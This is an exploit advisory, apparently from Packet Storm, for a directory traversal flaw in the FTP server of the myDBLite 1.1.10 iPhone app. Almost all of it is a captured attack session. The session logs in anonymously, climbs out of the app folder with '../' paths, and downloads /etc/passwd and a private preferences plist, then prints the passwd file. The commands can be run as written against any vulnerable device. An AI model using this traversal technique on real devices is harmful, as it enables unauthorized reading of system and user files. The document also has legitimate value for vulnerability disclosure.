myDBLite 1.1.10 For iPhone / iPod Touch Directory Traversal

2011-02-24T00:00:00
ID PACKETSTORM:98698
Type packetstorm
Reporter Sunlight
Modified 2011-02-24T00:00:00

Description

                                        
                                            `# Exploit Title : myDBLite v1.1.10 for iPhone / iPod touch, Directory Traversal  
# Date: 02/24/2011  
# Author: R3d@l3rt, Sp@2K, Sp@2K, Sunlight, H@ckk3y  
# Software Link: http://itunes.apple.com/kr/app/mydb-lite/id335521112?mt=8  
# Version: 1.1.10  
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware   
  
# There is directory traversal vulnerability in the myDBLite.   
# Exploit Testing  
  
C:\>ftp  
ftp> open 192.168.0.70 29161  
Connected to 192.168.0.70.  
220 DiddyDJ FTP server ready.  
User (192.168.0.70:(none)): anonymous  
331 Password required for anonymous  
Password:  
230 User logged in.  
ftp> dir  
200: PORT command successful.  
150: Opening ASCII mode data connection for '/bin/ls'.  
  
-rw-r--r-- 1 mobile mobile 429 1??09 10:55 appConfig.plist  
-rw-r--r-- 1 mobile mobile 429 1??09 10:55 appConfigInit.plist  
-rw-r--r-- 1 mobile mobile 899 1??09 10:55 appData.plist  
-rw-r--r-- 1 mobile mobile 899 1??09 10:55 appDataInit.plist  
-rw-r--r-- 1 mobile mobile 9859 1??09 10:55 astonmartin.jpg  
-rw-r--r-- 1 mobile mobile 20 1??09 10:55 astonmartin.txt  
-rw-r--r-- 1 mobile mobile 11128 1??09 10:55 ferrari.jpg  
-rw-r--r-- 1 mobile mobile 74 1??09 10:55 ferrari.txt  
-rw-r--r-- 1 mobile mobile 32797 1??09 10:55 frey.jpg  
-rw-r--r-- 1 mobile mobile 17553 1??09 10:55 porsche.jpg  
-rw-r--r-- 1 mobile mobile 111 1??09 10:55 porsche.txt  
-rw-r--r-- 1 mobile mobile 422 2??24 15:20 pswd.bkup  
-rw-r--r-- 1 mobile mobile 422 2??24 15:21 pswd.plist  
-rw-r--r-- 1 mobile mobile 54378 1??09 10:55 schinznach.jpg  
drwxr-xr-x 12 mobile mobile 476 1??04 14:43 secret  
  
226 Transfer complete.  
ftp: 1044 bytes received in 0.02Seconds 65.25Kbytes/sec.  
ftp> cd ../../../../../../  
250 CWD command successful.  
ftp> dir  
200: PORT command successful.  
150: Opening ASCII mode data connection for '/bin/ls'.  
  
-rwxr-xr-x 40 root admin 30 10??26 01:20 Applications  
drwxrwxr-x 1 root admin 68 8??19 04:10 Developer  
drwxrwxr-x 24 root admin 884 1??12 12:53 Library  
drwxr-xr-x 1 root wheel 102 8??19 04:18 System  
-rwxr-xr-x 7 root admin 11 2??23 19:41 User  
drwxr-xr-x 59 root wheel 2074 1??13 09:52 bin  
drwxr-xr-x 1 root admin 68 10??26 01:19 boot  
-rw-r--r-- 1 (null) (null) 638 1??25 15:30 control  
drwxrwxr-x 1 root admin 68 8??03 12:41 cores  
---------- 1 (null) (null) 0 (null) dev  
-rwxr-xr-x 25 root admin 11 8??26 05:20 etc  
drwxr-xr-x 1 root admin 68 10??26 01:19 lib  
drwxr-xr-x 1 root admin 68 10??26 01:19 mnt  
drwxr-xr-x 2 root wheel 136 10??23 15:12 private  
drwxr-xr-x 47 root wheel 1666 1??13 09:52 sbin  
-rwxr-xr-x 5 root admin 15 8??26 05:20 tmp  
drwxr-xr-x 9 root wheel 374 1??13 09:52 usr  
-rwxr-xr-x 26 root admin 11 8??26 05:20 var  
  
226 Transfer complete.  
ftp: 1128 bytes received in 0.02Seconds 70.50Kbytes/sec.  
ftp> get ../../../../../etc/passwd  
200: PORT command successful.  
150: Opening BINARY mode data connection for '../../../../../etc/passwd'.  
226 Transfer complete.  
ftp: 787 bytes received in 0.00Seconds 787000.00Kbytes/sec.  
ftp> get ../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist  
200: PORT command successful.  
150: Opening BINARY mode data connection for '../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist'.  
226 Transfer complete.  
ftp: 272 bytes received in 0.00Seconds 272000.00Kbytes/sec.  
ftp> quit  
221- Data traffic for this session was 0 bytes in 0 files  
  
C:\>type passwd  
#  
# 4.3BSD-compatable User Database  
#  
# Note that this file is not consulted for login.  
# It only exisits for compatability with 4.3BSD utilities.  
#  
# This file is automatically re-written by various system utilities.  
# Do not edit this file. Changes will be lost.  
#  
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false  
root:*:0:0:System Administrator:/var/root:/bin/sh  
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh  
daemon:*:1:1:System Services:/var/root:/usr/bin/false  
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false  
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false  
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false  
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false  
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false  
  
`